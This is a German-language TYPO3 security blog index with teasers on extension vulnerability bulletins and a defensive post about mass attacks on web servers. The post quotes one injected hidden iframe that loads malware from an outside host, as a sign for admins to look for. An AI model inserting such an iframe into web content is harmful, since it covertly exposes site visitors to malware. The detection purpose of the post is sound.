Das heutige Security Bulletin zu “civserv”, dem virtuellen Rathaus für TYPO3, hat eine besondere Vorgeschichte: Gefunden wurden die Schwachstellen nämlich im Rahmen eines ausführlichen “Extension Review”, also der gezielten Prüfung der Extension im Auftrag der Entwickler. Geleitet wurde dieses Review durch Peter Niederlag, Mitglied des TYPO3 Security Teams und Mitverfasser des “TYPO3 Kochbuch“. Als erstes Interview im Rahmen dieses Blogs habe ich Peter einmal gefragt, wie das ablief.

| Ganzen Beitrag lesen …

Die Reihe der Security Bulletins reisst nicht ab: Das TYPO3 Security Team hat schwerwiegende (Cross-Site-Scripting and SQL-Injection) Probleme in der TYPO3 Dritt-Extension “civserv” (”virtuelles Rathaus”) gefunden und eine Behebung bereitgestellt, die jeder Anwender der Extension dringend installieren sollte!
Details finden sich im offiziellen Security Bulletin.

| Ganzen Beitrag lesen …

Hallo allerseits! Wie schon angekündigt, möchten wir die gegenwärtigen und künftigen Hackerangriffe besser verstehen und zu diesem Zweck mit einen (perspektivisch: mehrere) Honeypot aufsetzen.

| Ganzen Beitrag lesen …

Das TYPO3 Security Team hat ein schwerwiegendes Problem in der TYPO3 Dritt-Extension “fechangepassword” gefunden und eine Behebung bereitgestellt, die jeder Anwender der Extension dringend installieren sollte!
Details finden sich im offiziellen Security Bulletin.

Dies ist bereits das dritte als ernsthaft eingestufte Problem innerhalb einer Woche. Auch hier ist wieder eine Dritt-Extension betroffen. Man darf davon ausgehen, dass nicht plötzlich schlechtere Extensions als bislang verfügbar sind, sondern dass das Teamleiter Lars Houmark die Aktivitäten des Security Teams im Bereich Schwachstellensuche verschärft hat. Weitere Bulletins sind also wahrscheinlich…

Das TYPO3 Security Team hat ein schwerwiegendes Problem in der TYPO3 Dritt-Extension “ftpbrowser” gefunden und eine Behebung bereitgestellt, die jeder Anwender der Extension dringend installieren sollte!

Details finden sich im offiziellen Security Bulletin.

Was wir gegenwärtig erleben, erreicht tatsächlich neue Dimensionen: Server werden - vermutlich zentral gesteuert - automatisiert massenhaft auf bekannt Lücken gescannt und gehackt. Und das nicht primär, um z.B. vertrauliche Daten vom Server zu gewinnen oder die Website zu verunstalten, sondern um als nächstes massenhaft Endbenutzer-PCs anzugreifen. Ein logischer nächster Schritt… leider. Was dahintersteht:

| Ganzen Beitrag lesen …

[A translated version of this article is available on the official TYPO3 Blog page]

Schon seit einiger Zeit wird von wiederkehrenden Angriffen auf Webserver berichtet, so etwa in den Pressemeldungen “Groß angelegter Angriff auf Web-Anwender im Gange”, “Weitere Details zu Web-Attack-Toolkit MPack” “Schneeball-Effekt: nur ein anfälliges PHP-Script genügt” und vielen anderen Quellen. In diesen Angriffen werden - zumindest teilweise automatisiert - verschiedene Wege ausgenutzt, um Kontrolle über die Webserver zu erlangen.

Dies hat nun auch TYPO3 (und andere CMS-Systeme) erreicht: Einige Berichte zu solchen Vorkommnissen waren in Foren zu lesen, andere wurden diskret dem TYPO3 Security Team gemeldet. In diesem Artikel möchte ich vorstellen, was davon von allgemeinem Interesse ist.

“Woran kann ich erkennen, ob mein System betroffen ist?”

Das “Hacken” der Systeme wird momentan offenbar vor allem ausgenutzt, um kleine HTML “Inline-Frames” (iFrames) im Seiteninhalt zu verankern. Wenn ich also als ahnungsloser Endbenutzer eine betroffenen Webseite besuche, sieht diese möglicherweise ganz normal aus - allerdings wird unbemerkt zusätzlicher Inhalt von einem fremden Server geladen. Dies kann Schadsoftware aller Art sein (die ihrerseits z.B. neue Javascript- oder Windows-Lücken ausnutzt.)

Die gehackten Systeme werden also als zentral gesteuerte “Malware-Schleuder” verwendet. (ABER: Dies kann sich schon morgen ändern! Wenn die Hacker sich überlegen, die betroffenen Server anderweitig zu mißbrauchen oder gar zu zerstören, werden sie das tun können.) Links zu weiteren Analysen finden sich z.B. im o.g. Heise-Artikel.

Bleiben wir bei den iFrame-Attacken. Wie sehen diese nun konkret aus? Das Prinzip ist klar: Im Seitenquelltext findet sich die Einbindung eines iFrame, z.B. in der einfachsten Schreibweise:
<iframe src=http://www.alexa-rank.info/libraries/iframe.php
?u=a4" style="display:none"></iframe>

Doch die Hacker (oder sogar nur “der Hacker”?) haben inzwischen viele andere Varianten hinterlassen, die verschleiern sollen, was vor sich geht. | Ganzen Beitrag lesen …

Hallo und Willkommen auf der TYPO3 Security Blog Seite für alle interessierten Administratoren, Entwickler und Anwender!

Hier gibt’s Informationen zu Sicherheitsfragen rund um TYPO3 - Allgemeine Tipps ebenso wie Hintergründe zu konkreten Problemen, oder auch Diskussion von inhaltliche Neuerungen und Verbesserungen von TYPO3 und Extensions.

Überhaupt, Extensions: Die meisten TYPO3-Sites bestehen heute überwiegend aus “Dritt-Extensions”, die nicht Bestandteil des Kernprodukts sind. Von daher drehen sich viele Sicherheitsfragen eher um Erweiterungen als um den Kern. Diese sollen hier natürlich mitbetrachtet werden, ich versuche allerdings immer, die Einordnung klarzustellen…

Dieser Blog ist keine offizielle Veröffentlichung des TYPO3 Projekts oder des TYPO3 Security Teams.

Ekkehard Gümbel